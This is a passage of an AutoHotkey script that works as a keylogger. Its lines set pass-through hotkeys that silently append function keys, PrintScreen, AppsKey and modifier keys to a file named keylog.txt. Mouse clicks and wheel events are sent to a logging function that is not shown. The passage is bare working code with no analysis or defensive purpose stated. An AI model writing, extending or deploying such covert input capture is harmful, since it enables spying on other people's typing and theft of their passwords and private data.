~^F19::FileAppend, {F19}, *keylog.txt
~F20::FileAppend, {F20}, *keylog.txt
~#F20::FileAppend, {F20}, *keylog.txt
~!F20::FileAppend, {F20}, *keylog.txt
~^F20::FileAppend, {F20}, *keylog.txt
~F21::FileAppend, {F21}, *keylog.txt
~#F21::FileAppend, {F21}, *keylog.txt
~!F21::FileAppend, {F21}, *keylog.txt
~^F21::FileAppend, {F21}, *keylog.txt
~F22::FileAppend, {F22}, *keylog.txt
~#F22::FileAppend, {F22}, *keylog.txt
~!F22::FileAppend, {F22}, *keylog.txt
~^F22::FileAppend, {F22}, *keylog.txt
~F23::FileAppend, {F23}, *keylog.txt
~#F23::FileAppend, {F23}, *keylog.txt
~!F23::FileAppend, {F23}, *keylog.txt
~^F23::FileAppend, {F23}, *keylog.txt
~F24::FileAppend, {F24}, *keylog.txt
~#F24::FileAppend, {F24}, *keylog.txt
~!F24::FileAppend, {F24}, *keylog.txt
~^F24::FileAppend, {F24}, *keylog.txt
~AppsKey::FileAppend, {AppsKey}, *keylog.txt
~#AppsKey::FileAppend, {AppsKey}, *keylog.txt
~!AppsKey::FileAppend, {AppsKey}, *keylog.txt
~^AppsKey::FileAppend, {AppsKey}, *keylog.txt

~PrintScreen::FileAppend, {PrintScreen}, *keylog.txt
~#PrintScreen::FileAppend, {PrintScreen}, *keylog.txt
~!PrintScreen::FileAppend, {PrintScreen}, *keylog.txt
~^PrintScreen::FileAppend, {PrintScreen}, *keylog.txt

~LButton::mouseevent("LButton")
~#LButton::mouseevent("LButton")
~!LButton::mouseevent("LButton")
~^LButton::mouseevent("LButton")
~MButton::mouseevent("MButton")
~#MButton::mouseevent("MButton")
~!MButton::mouseevent("MButton")
~^MButton::mouseevent("MButton")
~RButton::mouseevent("RButton")
~#RButton::mouseevent("RButton")
~!RButton::mouseevent("RButton")
~^RButton::mouseevent("RButton")
~WheelDown::mouseevent("WheelDown")
~#WheelDown::mouseevent("WheelDown")
~!WheelDown::mouseevent("WheelDown")
~^WheelDown::mouseevent("WheelDown")
~WheelUp::mouseevent("WheelUp")
~#WheelUp::mouseevent("WheelUp")
~!WheelUp::mouseevent("WheelUp")
~^WheelUp::mouseevent("WheelUp")
~WheelLeft::mouseevent("WheelLeft")
~#WheelLeft::mouseevent("WheelLeft")
~!WheelLeft::mouseevent("WheelLeft")
~^WheelLeft::mouseevent("WheelLeft")
~WheelRight::mouseevent("WheelRight")
~#WheelRight::mouseevent("WheelRight")
~!WheelRight::mouseevent("WheelRight")
~^WheelRight::mouseevent("WheelRight")

~LWin::FileAppend, {LWin}, *keylog.txt
~RWin::FileAppend, {RWin}, *keylog.txt
~LControl::FileAppend, {LControl}, *keylog.txt
~RControl::FileAppend, {RControl}, *keylog.txt
~LShift::FileAppend, {LShift}, *keylog.txt
~RShift::FileAppend, {RShift}, *keylog.txt
~LAlt::FileAppend, {LAlt}, *keylog.txt
~RAlt::FileAppend, {RAlt}, *keylog.txt

